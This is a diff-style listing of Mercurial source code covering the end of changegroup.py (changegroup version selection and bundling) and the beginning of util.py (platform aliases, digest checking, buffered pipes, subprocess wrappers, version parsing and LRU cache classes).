881 874 def allsupportedversions(repo):
882 875 versions = set(_packermap.keys())
883 876 if not (repo.ui.configbool('experimental', 'changegroup3') or
884 877 repo.ui.configbool('experimental', 'treemanifest') or
885 878 'treemanifest' in repo.requirements):
886 879 versions.discard('03')
887 880 return versions
888 881
889 882 # Changegroup versions that can be applied to the repo
890 883 def supportedincomingversions(repo):
891 884 return allsupportedversions(repo)
892 885
893 886 # Changegroup versions that can be created from the repo
894 887 def supportedoutgoingversions(repo):
895 888 versions = allsupportedversions(repo)
896 889 if 'treemanifest' in repo.requirements:
897 890 # Versions 01 and 02 support only flat manifests and it's just too
898 891 # expensive to convert between the flat manifest and tree manifest on
899 892 # the fly. Since tree manifests are hashed differently, all of history
900 893 # would have to be converted. Instead, we simply don't even pretend to
901 894 # support versions 01 and 02.
902 895 versions.discard('01')
903 896 versions.discard('02')
904 897 return versions
905 898
906 899 def localversion(repo):
907 900 # Finds the best version to use for bundles that are meant to be used
908 901 # locally, such as those from strip and shelve, and temporary bundles.
909 902 return max(supportedoutgoingversions(repo))
910 903
911 904 def safeversion(repo):
912 905 # Finds the smallest version that it's safe to assume clients of the repo
913 906 # will support. For example, all hg versions that support generaldelta also
914 907 # support changegroup 02.
915 908 versions = supportedoutgoingversions(repo)
916 909 if 'generaldelta' in repo.requirements:
917 910 versions.discard('01')
918 911 assert versions
919 912 return min(versions)
920 913
921 914 def getbundler(version, repo, bundlecaps=None):
922 915 assert version in supportedoutgoingversions(repo)
923 916 return _packermap[version][0](repo, bundlecaps)
924 917
925 918 def getunbundler(version, fh, alg, extras=None):
926 919 return _packermap[version][1](fh, alg, extras=extras)
927 920
928 921 def _changegroupinfo(repo, nodes, source):
929 922 if repo.ui.verbose or source == 'bundle':
930 923 repo.ui.status(_("%d changesets found\n") % len(nodes))
931 924 if repo.ui.debugflag:
932 925 repo.ui.debug("list of changesets:\n")
933 926 for node in nodes:
934 927 repo.ui.debug("%s\n" % hex(node))
935 928
936 929 def makechangegroup(repo, outgoing, version, source, fastpath=False,
937 930 bundlecaps=None):
938 931 cgstream = makestream(repo, outgoing, version, source,
939 932 fastpath=fastpath, bundlecaps=bundlecaps)
940 933 return getunbundler(version, util.chunkbuffer(cgstream), None,
941 934 {'clcount': len(outgoing.missing) })
942 935
943 936 def makestream(repo, outgoing, version, source, fastpath=False,
944 937 bundlecaps=None):
945 938 bundler = getbundler(version, repo, bundlecaps=bundlecaps)
946 939
947 940 repo = repo.unfiltered()
948 941 commonrevs = outgoing.common
949 942 csets = outgoing.missing
950 943 heads = outgoing.missingheads
951 944 # We go through the fast path if we get told to, or if all (unfiltered
952 945 # heads have been requested (since we then know there all linkrevs will
953 946 # be pulled by the client).
954 947 heads.sort()
955 948 fastpathlinkrev = fastpath or (
956 949 repo.filtername is None and heads == sorted(repo.heads()))
957 950
958 951 repo.hook('preoutgoing', throw=True, source=source)
959 952 _changegroupinfo(repo, csets, source)
960 953 return bundler.generate(commonrevs, csets, fastpathlinkrev, source)
961 954
962 955 def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
963 956 revisions = 0
964 957 files = 0
965 958 for chunkdata in iter(source.filelogheader, {}):
966 959 files += 1
967 960 f = chunkdata["filename"]
968 961 repo.ui.debug("adding %s revisions\n" % f)
969 962 repo.ui.progress(_('files'), files, unit=_('files'),
970 963 total=expectedfiles)
971 964 fl = repo.file(f)
972 965 o = len(fl)
973 966 try:
974 967 deltas = source.deltaiter()
975 968 if not fl.addgroup(deltas, revmap, trp):
976 969 raise error.Abort(_("received file revlog group is empty"))
977 970 except error.CensoredBaseError as e:
978 971 raise error.Abort(_("received delta base is censored: %s") % e)
979 972 revisions += len(fl) - o
980 973 if f in needfiles:
981 974 needs = needfiles[f]
982 975 for new in xrange(o, len(fl)):
983 976 n = fl.node(new)
984 977 if n in needs:
985 978 needs.remove(n)
986 979 else:
987 980 raise error.Abort(
988 981 _("received spurious file revlog entry"))
989 982 if not needs:
990 983 del needfiles[f]
991 984 repo.ui.progress(_('files'), None)
992 985
993 986 for f, needs in needfiles.iteritems():
994 987 fl = repo.file(f)
995 988 for n in needs:
996 989 try:
997 990 fl.rev(n)
998 991 except error.LookupError:
999 992 raise error.Abort(
1000 993 _('missing file data for %s:%s - run hg verify') %
1001 994 (f, hex(n)))
1002 995
1003 996 return revisions, files
@@ -1,3867 +1,3876 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 node as nodemod,
53 53 policy,
54 54 pycompat,
55 55 urllibcompat,
56 56 )
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 spawndetached = platform.spawndetached
151 151 split = platform.split
152 152 sshargs = platform.sshargs
153 153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 154 statisexec = platform.statisexec
155 155 statislink = platform.statislink
156 156 testpid = platform.testpid
157 157 umask = platform.umask
158 158 unlink = platform.unlink
159 159 username = platform.username
160 160
161 161 try:
162 162 recvfds = osutil.recvfds
163 163 except AttributeError:
164 164 pass
165 165 try:
166 166 setprocname = osutil.setprocname
167 167 except AttributeError:
168 168 pass
169 169 try:
170 170 unblocksignal = osutil.unblocksignal
171 171 except AttributeError:
172 172 pass
173 173
174 174 # Python compatibility
175 175
176 176 _notset = object()
177 177
178 178 # disable Python's problematic floating point timestamps (issue4836)
179 179 # (Python hypocritically says you shouldn't change this behavior in
180 180 # libraries, and sure enough Mercurial is not a library.)
181 181 os.stat_float_times(False)
182 182
183 183 def safehasattr(thing, attr):
184 184 return getattr(thing, attr, _notset) is not _notset
185 185
186 186 def bytesinput(fin, fout, *args, **kwargs):
187 187 sin, sout = sys.stdin, sys.stdout
188 188 try:
189 189 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
190 190 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
191 191 finally:
192 192 sys.stdin, sys.stdout = sin, sout
193 193
194 194 def bitsfrom(container):
195 195 bits = 0
196 196 for bit in container:
197 197 bits |= bit
198 198 return bits
199 199
200 200 # python 2.6 still have deprecation warning enabled by default. We do not want
201 201 # to display anything to standard user so detect if we are running test and
202 202 # only use python deprecation warning in this case.
203 203 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
204 204 if _dowarn:
205 205 # explicitly unfilter our warning for python 2.7
206 206 #
207 207 # The option of setting PYTHONWARNINGS in the test runner was investigated.
208 208 # However, module name set through PYTHONWARNINGS was exactly matched, so
209 209 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
210 210 # makes the whole PYTHONWARNINGS thing useless for our usecase.
211 211 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
212 212 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
213 213 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
214 214
215 215 def nouideprecwarn(msg, version, stacklevel=1):
216 216 """Issue an python native deprecation warning
217 217
218 218 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
219 219 """
220 220 if _dowarn:
221 221 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
222 222 " update your code.)") % version
223 223 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
224 224
225 225 DIGESTS = {
226 226 'md5': hashlib.md5,
227 227 'sha1': hashlib.sha1,
228 228 'sha512': hashlib.sha512,
229 229 }
230 230 # List of digest types from strongest to weakest
231 231 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
232 232
233 233 for k in DIGESTS_BY_STRENGTH:
234 234 assert k in DIGESTS
235 235
236 236 class digester(object):
237 237 """helper to compute digests.
238 238
239 239 This helper can be used to compute one or more digests given their name.
240 240
241 241 >>> d = digester([b'md5', b'sha1'])
242 242 >>> d.update(b'foo')
243 243 >>> [k for k in sorted(d)]
244 244 ['md5', 'sha1']
245 245 >>> d[b'md5']
246 246 'acbd18db4cc2f85cedef654fccc4a4d8'
247 247 >>> d[b'sha1']
248 248 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
249 249 >>> digester.preferred([b'md5', b'sha1'])
250 250 'sha1'
251 251 """
252 252
253 253 def __init__(self, digests, s=''):
254 254 self._hashes = {}
255 255 for k in digests:
256 256 if k not in DIGESTS:
257 257 raise Abort(_('unknown digest type: %s') % k)
258 258 self._hashes[k] = DIGESTS[k]()
259 259 if s:
260 260 self.update(s)
261 261
262 262 def update(self, data):
263 263 for h in self._hashes.values():
264 264 h.update(data)
265 265
266 266 def __getitem__(self, key):
267 267 if key not in DIGESTS:
268 268 raise Abort(_('unknown digest type: %s') % k)
269 269 return nodemod.hex(self._hashes[key].digest())
270 270
271 271 def __iter__(self):
272 272 return iter(self._hashes)
273 273
274 274 @staticmethod
275 275 def preferred(supported):
276 276 """returns the strongest digest type in both supported and DIGESTS."""
277 277
278 278 for k in DIGESTS_BY_STRENGTH:
279 279 if k in supported:
280 280 return k
281 281 return None
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise Abort(_('size mismatch: expected %d, got %d') %
308 308 (self._size, self._got))
309 309 for k, v in self._digests.items():
310 310 if v != self._digester[k]:
311 311 # i18n: first parameter is a digest name
312 312 raise Abort(_('%s mismatch: expected %s, got %s') %
313 313 (k, v, self._digester[k]))
314 314
315 315 try:
316 316 buffer = buffer
317 317 except NameError:
318 318 def buffer(sliceable, offset=0, length=None):
319 319 if length is not None:
320 320 return memoryview(sliceable)[offset:offset + length]
321 321 return memoryview(sliceable)[offset:]
322 322
323 323 closefds = pycompat.isposix
324 324
325 325 _chunksize = 4096
326 326
327 327 class bufferedinputpipe(object):
328 328 """a manually buffered input pipe
329 329
330 330 Python will not let us use buffered IO and lazy reading with 'polling' at
331 331 the same time. We cannot probe the buffer state and select will not detect
332 332 that data are ready to read if they are already buffered.
333 333
334 334 This class let us work around that by implementing its own buffering
335 335 (allowing efficient readline) while offering a way to know if the buffer is
336 336 empty from the output (allowing collaboration of the buffer with polling).
337 337
338 338 This class lives in the 'util' module because it makes use of the 'os'
339 339 module from the python stdlib.
340 340 """
341 341
342 342 def __init__(self, input):
343 343 self._input = input
344 344 self._buffer = []
345 345 self._eof = False
346 346 self._lenbuf = 0
347 347
348 348 @property
349 349 def hasbuffer(self):
350 350 """True is any data is currently buffered
351 351
352 352 This will be used externally a pre-step for polling IO. If there is
353 353 already data then no polling should be set in place."""
354 354 return bool(self._buffer)
355 355
356 356 @property
357 357 def closed(self):
358 358 return self._input.closed
359 359
360 360 def fileno(self):
361 361 return self._input.fileno()
362 362
363 363 def close(self):
364 364 return self._input.close()
365 365
366 366 def read(self, size):
367 367 while (not self._eof) and (self._lenbuf < size):
368 368 self._fillbuffer()
369 369 return self._frombuffer(size)
370 370
371 371 def readline(self, *args, **kwargs):
372 372 if 1 < len(self._buffer):
373 373 # this should not happen because both read and readline end with a
374 374 # _frombuffer call that collapse it.
375 375 self._buffer = [''.join(self._buffer)]
376 376 self._lenbuf = len(self._buffer[0])
377 377 lfi = -1
378 378 if self._buffer:
379 379 lfi = self._buffer[-1].find('\n')
380 380 while (not self._eof) and lfi < 0:
381 381 self._fillbuffer()
382 382 if self._buffer:
383 383 lfi = self._buffer[-1].find('\n')
384 384 size = lfi + 1
385 385 if lfi < 0: # end of file
386 386 size = self._lenbuf
387 387 elif 1 < len(self._buffer):
388 388 # we need to take previous chunks into account
389 389 size += self._lenbuf - len(self._buffer[-1])
390 390 return self._frombuffer(size)
391 391
392 392 def _frombuffer(self, size):
393 393 """return at most 'size' data from the buffer
394 394
395 395 The data are removed from the buffer."""
396 396 if size == 0 or not self._buffer:
397 397 return ''
398 398 buf = self._buffer[0]
399 399 if 1 < len(self._buffer):
400 400 buf = ''.join(self._buffer)
401 401
402 402 data = buf[:size]
403 403 buf = buf[len(data):]
404 404 if buf:
405 405 self._buffer = [buf]
406 406 self._lenbuf = len(buf)
407 407 else:
408 408 self._buffer = []
409 409 self._lenbuf = 0
410 410 return data
411 411
412 412 def _fillbuffer(self):
413 413 """read data to the buffer"""
414 414 data = os.read(self._input.fileno(), _chunksize)
415 415 if not data:
416 416 self._eof = True
417 417 else:
418 418 self._lenbuf += len(data)
419 419 self._buffer.append(data)
420 420
421 421 def mmapread(fp):
422 422 try:
423 423 fd = getattr(fp, 'fileno', lambda: fp)()
424 424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
425 425 except ValueError:
426 426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 427 # if the file is empty, and if so, return an empty buffer.
428 428 if os.fstat(fd).st_size == 0:
429 429 return ''
430 430 raise
431 431
432 432 def popen2(cmd, env=None, newlines=False):
433 433 # Setting bufsize to -1 lets the system decide the buffer size.
434 434 # The default for bufsize is 0, meaning unbuffered. This leads to
435 435 # poor performance on Mac OS X: http://bugs.python.org/issue4194
436 436 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
437 437 close_fds=closefds,
438 438 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
439 439 universal_newlines=newlines,
440 440 env=env)
441 441 return p.stdin, p.stdout
442 442
443 443 def popen3(cmd, env=None, newlines=False):
444 444 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
445 445 return stdin, stdout, stderr
446 446
447 447 def popen4(cmd, env=None, newlines=False, bufsize=-1):
448 448 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
449 449 close_fds=closefds,
450 450 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
451 451 stderr=subprocess.PIPE,
452 452 universal_newlines=newlines,
453 453 env=env)
454 454 return p.stdin, p.stdout, p.stderr, p
455 455
456 456 def version():
457 457 """Return version information if available."""
458 458 try:
459 459 from . import __version__
460 460 return __version__.version
461 461 except ImportError:
462 462 return 'unknown'
463 463
464 464 def versiontuple(v=None, n=4):
465 465 """Parses a Mercurial version string into an N-tuple.
466 466
467 467 The version string to be parsed is specified with the ``v`` argument.
468 468 If it isn't defined, the current Mercurial version string will be parsed.
469 469
470 470 ``n`` can be 2, 3, or 4. Here is how some version strings map to
471 471 returned values:
472 472
473 473 >>> v = b'3.6.1+190-df9b73d2d444'
474 474 >>> versiontuple(v, 2)
475 475 (3, 6)
476 476 >>> versiontuple(v, 3)
477 477 (3, 6, 1)
478 478 >>> versiontuple(v, 4)
479 479 (3, 6, 1, '190-df9b73d2d444')
480 480
481 481 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
482 482 (3, 6, 1, '190-df9b73d2d444+20151118')
483 483
484 484 >>> v = b'3.6'
485 485 >>> versiontuple(v, 2)
486 486 (3, 6)
487 487 >>> versiontuple(v, 3)
488 488 (3, 6, None)
489 489 >>> versiontuple(v, 4)
490 490 (3, 6, None, None)
491 491
492 492 >>> v = b'3.9-rc'
493 493 >>> versiontuple(v, 2)
494 494 (3, 9)
495 495 >>> versiontuple(v, 3)
496 496 (3, 9, None)
497 497 >>> versiontuple(v, 4)
498 498 (3, 9, None, 'rc')
499 499
500 500 >>> v = b'3.9-rc+2-02a8fea4289b'
501 501 >>> versiontuple(v, 2)
502 502 (3, 9)
503 503 >>> versiontuple(v, 3)
504 504 (3, 9, None)
505 505 >>> versiontuple(v, 4)
506 506 (3, 9, None, 'rc+2-02a8fea4289b')
507 507 """
508 508 if not v:
509 509 v = version()
510 510 parts = remod.split('[\+-]', v, 1)
511 511 if len(parts) == 1:
512 512 vparts, extra = parts[0], None
513 513 else:
514 514 vparts, extra = parts
515 515
516 516 vints = []
517 517 for i in vparts.split('.'):
518 518 try:
519 519 vints.append(int(i))
520 520 except ValueError:
521 521 break
522 522 # (3, 6) -> (3, 6, None)
523 523 while len(vints) < 3:
524 524 vints.append(None)
525 525
526 526 if n == 2:
527 527 return (vints[0], vints[1])
528 528 if n == 3:
529 529 return (vints[0], vints[1], vints[2])
530 530 if n == 4:
531 531 return (vints[0], vints[1], vints[2], extra)
532 532
533 533 # used by parsedate
534 534 defaultdateformats = (
535 535 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
536 536 '%Y-%m-%dT%H:%M', # without seconds
537 537 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
538 538 '%Y-%m-%dT%H%M', # without seconds
539 539 '%Y-%m-%d %H:%M:%S', # our common legal variant
540 540 '%Y-%m-%d %H:%M', # without seconds
541 541 '%Y-%m-%d %H%M%S', # without :
542 542 '%Y-%m-%d %H%M', # without seconds
543 543 '%Y-%m-%d %I:%M:%S%p',
544 544 '%Y-%m-%d %H:%M',
545 545 '%Y-%m-%d %I:%M%p',
546 546 '%Y-%m-%d',
547 547 '%m-%d',
548 548 '%m/%d',
549 549 '%m/%d/%y',
550 550 '%m/%d/%Y',
551 551 '%a %b %d %H:%M:%S %Y',
552 552 '%a %b %d %I:%M:%S%p %Y',
553 553 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
554 554 '%b %d %H:%M:%S %Y',
555 555 '%b %d %I:%M:%S%p %Y',
556 556 '%b %d %H:%M:%S',
557 557 '%b %d %I:%M:%S%p',
558 558 '%b %d %H:%M',
559 559 '%b %d %I:%M%p',
560 560 '%b %d %Y',
561 561 '%b %d',
562 562 '%H:%M:%S',
563 563 '%I:%M:%S%p',
564 564 '%H:%M',
565 565 '%I:%M%p',
566 566 )
567 567
568 568 extendeddateformats = defaultdateformats + (
569 569 "%Y",
570 570 "%Y-%m",
571 571 "%b",
572 572 "%b %Y",
573 573 )
574 574
575 575 def cachefunc(func):
576 576 '''cache the result of function calls'''
577 577 # XXX doesn't handle keywords args
578 578 if func.__code__.co_argcount == 0:
579 579 cache = []
580 580 def f():
581 581 if len(cache) == 0:
582 582 cache.append(func())
583 583 return cache[0]
584 584 return f
585 585 cache = {}
586 586 if func.__code__.co_argcount == 1:
587 587 # we gain a small amount of time because
588 588 # we don't need to pack/unpack the list
589 589 def f(arg):
590 590 if arg not in cache:
591 591 cache[arg] = func(arg)
592 592 return cache[arg]
593 593 else:
594 594 def f(*args):
595 595 if args not in cache:
596 596 cache[args] = func(*args)
597 597 return cache[args]
598 598
599 599 return f
600 600
601 601 class cow(object):
602 602 """helper class to make copy-on-write easier
603 603
604 604 Call preparewrite before doing any writes.
605 605 """
606 606
607 607 def preparewrite(self):
608 608 """call this before writes, return self or a copied new object"""
609 609 if getattr(self, '_copied', 0):
610 610 self._copied -= 1
611 611 return self.__class__(self)
612 612 return self
613 613
614 614 def copy(self):
615 615 """always do a cheap copy"""
616 616 self._copied = getattr(self, '_copied', 0) + 1
617 617 return self
618 618
619 619 class sortdict(collections.OrderedDict):
620 620 '''a simple sorted dictionary
621 621
622 622 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
623 623 >>> d2 = d1.copy()
624 624 >>> d2
625 625 sortdict([('a', 0), ('b', 1)])
626 626 >>> d2.update([(b'a', 2)])
627 627 >>> list(d2.keys()) # should still be in last-set order
628 628 ['b', 'a']
629 629 '''
630 630
631 631 def __setitem__(self, key, value):
632 632 if key in self:
633 633 del self[key]
634 634 super(sortdict, self).__setitem__(key, value)
635 635
636 636 if pycompat.ispypy:
637 637 # __setitem__() isn't called as of PyPy 5.8.0
638 638 def update(self, src):
639 639 if isinstance(src, dict):
640 640 src = src.iteritems()
641 641 for k, v in src:
642 642 self[k] = v
643 643
644 644 class cowdict(cow, dict):
645 645 """copy-on-write dict
646 646
647 647 Be sure to call d = d.preparewrite() before writing to d.
648 648
649 649 >>> a = cowdict()
650 650 >>> a is a.preparewrite()
651 651 True
652 652 >>> b = a.copy()
653 653 >>> b is a
654 654 True
655 655 >>> c = b.copy()
656 656 >>> c is a
657 657 True
658 658 >>> a = a.preparewrite()
659 659 >>> b is a
660 660 False
661 661 >>> a is a.preparewrite()
662 662 True
663 663 >>> c = c.preparewrite()
664 664 >>> b is c
665 665 False
666 666 >>> b is b.preparewrite()
667 667 True
668 668 """
669 669
670 670 class cowsortdict(cow, sortdict):
671 671 """copy-on-write sortdict
672 672
673 673 Be sure to call d = d.preparewrite() before writing to d.
674 674 """
675 675
676 676 class transactional(object):
677 677 """Base class for making a transactional type into a context manager."""
678 678 __metaclass__ = abc.ABCMeta
679 679
680 680 @abc.abstractmethod
681 681 def close(self):
682 682 """Successfully closes the transaction."""
683 683
684 684 @abc.abstractmethod
685 685 def release(self):
686 686 """Marks the end of the transaction.
687 687
688 688 If the transaction has not been closed, it will be aborted.
689 689 """
690 690
691 691 def __enter__(self):
692 692 return self
693 693
694 694 def __exit__(self, exc_type, exc_val, exc_tb):
695 695 try:
696 696 if exc_type is None:
697 697 self.close()
698 698 finally:
699 699 self.release()
700 700
701 701 @contextlib.contextmanager
702 702 def acceptintervention(tr=None):
703 703 """A context manager that closes the transaction on InterventionRequired
704 704
705 705 If no transaction was provided, this simply runs the body and returns
706 706 """
707 707 if not tr:
708 708 yield
709 709 return
710 710 try:
711 711 yield
712 712 tr.close()
713 713 except error.InterventionRequired:
714 714 tr.close()
715 715 raise
716 716 finally:
717 717 tr.release()
718 718
719 719 @contextlib.contextmanager
720 720 def nullcontextmanager():
721 721 yield
722 722
723 723 class _lrucachenode(object):
724 724 """A node in a doubly linked list.
725 725
726 726 Holds a reference to nodes on either side as well as a key-value
727 727 pair for the dictionary entry.
728 728 """
729 729 __slots__ = (u'next', u'prev', u'key', u'value')
730 730
731 731 def __init__(self):
732 732 self.next = None
733 733 self.prev = None
734 734
735 735 self.key = _notset
736 736 self.value = None
737 737
738 738 def markempty(self):
739 739 """Mark the node as emptied."""
740 740 self.key = _notset
741 741
742 742 class lrucachedict(object):
743 743 """Dict that caches most recent accesses and sets.
744 744
745 745 The dict consists of an actual backing dict - indexed by original
746 746 key - and a doubly linked circular list defining the order of entries in
747 747 the cache.
748 748
749 749 The head node is the newest entry in the cache. If the cache is full,
750 750 we recycle head.prev and make it the new head. Cache accesses result in
751 751 the node being moved to before the existing head and being marked as the
752 752 new head node.
753 753 """
754 754 def __init__(self, max):
755 755 self._cache = {}
756 756
757 757 self._head = head = _lrucachenode()
758 758 head.prev = head
759 759 head.next = head
760 760 self._size = 1
761 761 self._capacity = max
762 762
763 763 def __len__(self):
764 764 return len(self._cache)
765 765
766 766 def __contains__(self, k):
767 767 return k in self._cache
768 768
769 769 def __iter__(self):
770 770 # We don't have to iterate in cache order, but why not.
771 771 n = self._head
772 772 for i in range(len(self._cache)):
773 773 yield n.key
774 774 n = n.next
775 775
776 776 def __getitem__(self, k):
777 777 node = self._cache[k]
778 778 self._movetohead(node)
779 779 return node.value
780 780
781 781 def __setitem__(self, k, v):
782 782 node = self._cache.get(k)
783 783 # Replace existing value and mark as newest.
784 784 if node is not None:
785 785 node.value = v
786 786 self._movetohead(node)
787 787 return
788 788
789 789 if self._size < self._capacity:
790 790 node = self._addcapacity()
791 791 else:
792 792 # Grab the last/oldest item.
793 793 node = self._head.prev
794 794
795 795 # At capacity. Kill the old entry.
796 796 if node.key is not _notset:
797 797 del self._cache[node.key]
798 798
799 799 node.key = k
800 800 node.value = v
801 801 self._cache[k] = node
802 802 # And mark it as newest entry. No need to adjust order since it
803 803 # is already self._head.prev.
804 804 self._head = node
805 805
806 806 def __delitem__(self, k):
807 807 node = self._cache.pop(k)
808 808 node.markempty()
809 809
810 810 # Temporarily mark as newest item before re-adjusting head to make
811 811 # this node the oldest item.
812 812 self._movetohead(node)
813 813 self._head = node.next
814 814
815 815 # Additional dict methods.
816 816
817 817 def get(self, k, default=None):
818 818 try:
819 819 return self._cache[k].value
820 820 except KeyError:
821 821 return default
822 822
823 823 def clear(self):
824 824 n = self._head
825 825 while n.key is not _notset:
826 826 n.markempty()
827 827 n = n.next
828 828
829 829 self._cache.clear()
830 830
831 831 def copy(self):
832 832 result = lrucachedict(self._capacity)
833 833 n = self._head.prev
834 834 # Iterate in oldest-to-newest order, so the copy has the right ordering
835 835 for i in range(len(self._cache)):
836 836 result[n.key] = n.value
837 837 n = n.prev
838 838 return result
839 839
840 840 def _movetohead(self, node):
841 841 """Mark a node as the newest, making it the new head.
842 842
843 843 When a node is accessed, it becomes the freshest entry in the LRU
844 844 list, which is denoted by self._head.
845 845
846 846 Visually, let's make ``N`` the new head node (* denotes head):
847 847
848 848 previous/oldest <-> head <-> next/next newest
849 849
850 850 ----<->--- A* ---<->-----
851 851 | |
852 852 E <-> D <-> N <-> C <-> B
853 853
854 854 To:
855 855
856 856 ----<->--- N* ---<->-----
857 857 | |
858 858 E <-> D <-> C <-> B <-> A
859 859
860 860 This requires the following moves:
861 861
862 862 C.next = D (node.prev.next = node.next)
863 863 D.prev = C (node.next.prev = node.prev)
864 864 E.next = N (head.prev.next = node)
865 865 N.prev = E (node.prev = head.prev)
866 866 N.next = A (node.next = head)
867 867 A.prev = N (head.prev = node)
868 868 """
869 869 head = self._head
870 870 # C.next = D
871 871 node.prev.next = node.next
872 872 # D.prev = C
873 873 node.next.prev = node.prev
874 874 # N.prev = E
875 875 node.prev = head.prev
876 876 # N.next = A
877 877 # It is tempting to do just "head" here, however if node is
878 878 # adjacent to head, this will do bad things.
879 879 node.next = head.prev.next
880 880 # E.next = N
881 881 node.next.prev = node
882 882 # A.prev = N
883 883 node.prev.next = node
884 884
885 885 self._head = node
886 886
887 887 def _addcapacity(self):
888 888 """Add a node to the circular linked list.
889 889
